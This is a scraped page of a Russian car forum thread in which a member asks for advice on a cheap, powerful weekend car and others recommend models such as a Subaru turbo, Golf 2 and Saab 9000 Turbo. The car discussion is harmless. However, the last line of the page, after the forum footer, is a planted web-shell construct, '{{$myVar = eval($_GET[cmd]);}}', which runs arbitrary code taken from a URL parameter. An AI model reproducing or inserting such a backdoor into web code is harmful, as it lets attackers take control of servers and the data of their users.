+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 47

Тема: Помогите выбрать авто "для погонять"...


  1. #1
    Мимо проходил NeverGTI is on a distinguished road Аватар для NeverGTI
    Регистрация
    26.09.2007
    Сообщений
    20
    Здравствуйте люди добрые, вот и появился шанс отметиться в таком замечательном месте как ГТИ клуб :wub:

    Собственно вопрос вот в чём; хочу прикупить себе вторую машинку, что называется "на выходные" и никак не могу определиться, что же взять... :blink: Бюджет в 150,000 рубликов не позволяет особо раскатывать губы, но всё же хочется всего и помощнее... Конечно всё нутро смотрит на G3 VR6, но всё таки найти живую машину за эти деньги нереально, посему вопрос, а что можно найти аналогичного по хар-кам этому Гольфу??? На данный момент думаю об Ауди 90, в её активе хороший двиг и полный привод B) , хотя даже не знаю, можно ли найти её за столь скромную сумму в едущем состоянии??? В общем ПОМОГИТЕ!!!

    ЗЫ Год, пробег, марка/модель значения особого не играют, главное чтобы машЫнка хорошо екала и прожила в моих руках хотя бы годик, без особо сильного вмешательства, очень жду советов, ОЧЕНЬ!!!

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Subaru turbo
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Мимо проходил NeverGTI is on a distinguished road Аватар для NeverGTI
    Регистрация
    26.09.2007
    Сообщений
    20
    <div class='quotetop'>Цитата</div><div class='quotemain'>Subaru turbo[/b][/quote]

    Спасибо&#33;&#33;&#33; ))) О япошках даже не думал, ща обмозгую...

  4. #4
    GTI-Racing Lina will become famous soon enough Аватар для Lina
    Регистрация
    18.02.2007
    Машина
    GOLF R BLACK
    Сообщений
    1,526
    Альфа ромео 33
    :D
    1,7 оппозит.
    (советую на собственном опыте,
    :D сумасшедшая была машина)

  5. #5
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    бери г2 с кром или г60&#33;

  6. #6
    Мимо проходил NeverGTI is on a distinguished road Аватар для NeverGTI
    Регистрация
    26.09.2007
    Сообщений
    20
    Уважаемый магнум126, а можно поподробнее, что за г60?

    Сейчас думаю о:

    БМВ М5 Е28 85 г.в. Есть предложение))) Реально живая тачка, в активе 218 к.с. и вполне пристойное состояние... 175,000 руб.

    Ауди 90 90 г.в. Тож преложено))) 138 кобыл и полный привод в комплекте... Едет весело, но особо не впечатлила, зато рулится просто сказка 140,000 колов.

    СААБ 9000 Турбо. Ничего об этом звере путного не знаю(((( Но интересен.

    Вот этот аппарат порадовал: Мерседес 190 2,6

    Полноприводный Опель Калибра 2,0 И Всё вроде ОК, но смущает эмблема "Опель"...

    Субару 2000 Turbo Super 4WD (200 Hp) Очень понравился один отчётик в инете, вот и решил внести его в чёрный список.

    Вот этот самолётик очень зацепил: Гольфец 2 Мммм... мож кто о нём расскажет поподробнее???

    Ну вот вроде и всё... Прошу помочь советом, мож кто на чём нибудь из этого ездил/ездит сейчас???

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    <div class='quotetop'>Цитата(NeverGTI &#064; Oct 23 2007, 08&#58;31) <{POST_SNAPBACK}></div><div class='quotemain'>Уважаемый магнум126, а можно поподробнее, что за г60?

    Сейчас думаю о:

    БМВ М5 Е28 85 г.в. Есть предложение))) Реально живая тачка, в активе 218 к.с. и вполне пристойное состояние... 175,000 руб.

    Ауди 90 90 г.в. Тож преложено))) 138 кобыл и полный привод в комплекте... Едет весело, но особо не впечатлила, зато рулится просто сказка 140,000 колов.

    СААБ 9000 Турбо. Ничего об этом звере путного не знаю(((( Но интересен.

    Вот этот аппарат порадовал: Мерседес 190 2,6

    Полноприводный Опель Калибра 2,0 И Всё вроде ОК, но смущает эмблема "Опель"...

    Субару 2000 Turbo Super 4WD (200 Hp) Очень понравился один отчётик в инете, вот и решил внести его в чёрный список.

    Вот этот самолётик очень зацепил: Гольфец 2 Мммм... мож кто о нём расскажет поподробнее???

    Ну вот вроде и всё... Прошу помочь советом, мож кто на чём нибудь из этого ездил/ездит сейчас???[/b][/quote]

    хоть и берешь покататься недолго, наврядли избежать каких то поломок, особенно если каснись чего то у Бэхи.
    Второй носок при 2-х литрах 150 силах очень хороший вариант, да и ремонтопригодность тоже.
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    GTI-Racing magnum126 is on a distinguished road Аватар для magnum126
    Регистрация
    06.03.2006
    Откуда
    СВАО
    Машина
    opel manta B 1979, VW Derby 1982, VW Golf 6, AUDI A2 s-line, OPEL ZAFIRA COSMO!!
    Сообщений
    3,618
    лучше всего взять кр или если найдешь 9а&#33; это 16ве двиги которые очень хорошо как по городу так и на драге и которые есть возможность бюджетно доробатывать&#33; а при весе г2 они едут не хуже бмв 200сильной&#33; так что думай сам12

  9. #9
    GTI-Racing Lina will become famous soon enough Аватар для Lina
    Регистрация
    18.02.2007
    Машина
    GOLF R BLACK
    Сообщений
    1,526

  10. #10
    Самый бюджетный авто по обслуге и дающий бОльше остальных именно 9000ник турбо За 6 тыщ если не спешить можно найти отличный вариант 200 сил на коже с почти всеми причиндалами... Год 95-96. Стоимость запчастей - как на гольф, разборок достаточно, ремонтируется на коленке, "интерфейс" интуитивно понятный... Икеямобиль ака собери сам, самое лучшее обучающее пособие по автомобилям, при этом достаточно надеждное во всем.

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Помогите Выбрать Авто!
    от OZMAID в разделе Welcome to GTI-CLUB
    Ответов: 5
    Последнее сообщение: 08.04.2024, 21:48
  2. Ответов: 36
    Последнее сообщение: 05.04.2024, 21:47
  3. Ответов: 5
    Последнее сообщение: 03.01.2024, 23:06
  4. Ответов: 8
    Последнее сообщение: 30.08.2019, 17:04
  5. Кто слил актуальную тему "Где погонять???"
    от -=Нержавейкин=- в разделе Курилка
    Ответов: 8
    Последнее сообщение: 09.02.2007, 03:17

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}